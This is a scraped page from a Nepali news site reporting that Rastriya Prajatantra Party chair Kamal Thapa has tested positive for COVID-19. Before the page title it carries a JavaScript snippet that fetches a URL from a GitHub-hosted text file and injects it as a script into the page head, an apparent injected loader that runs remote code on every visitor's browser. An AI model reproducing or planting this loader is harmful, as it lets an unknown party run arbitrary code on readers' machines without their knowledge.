;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष कमल थापालाई कोरोना पुष्टि – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष कमल थापालाई कोरोना पुष्टि
समाचार

राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष कमल थापालाई कोरोना पुष्टि

असोज ३०,

काठमाडौं । राष्ट्रिय प्रजातन्त्र पार्टीका अध्यक्ष कमल थापालाई कोरोना संक्रमण पुष्टि भएको छ ।

उनलाई बिहिबार संक्रमणदेखिएको उनेल आफै टुवीट् मार्फत जानकारी दिएका छन् । उनले आफूूनजिक भएकाहरुको परीक्षण र सचेत् हुन् आग्रह गरेका छन् ।

फेसबुक प्रतिक्रियाहरु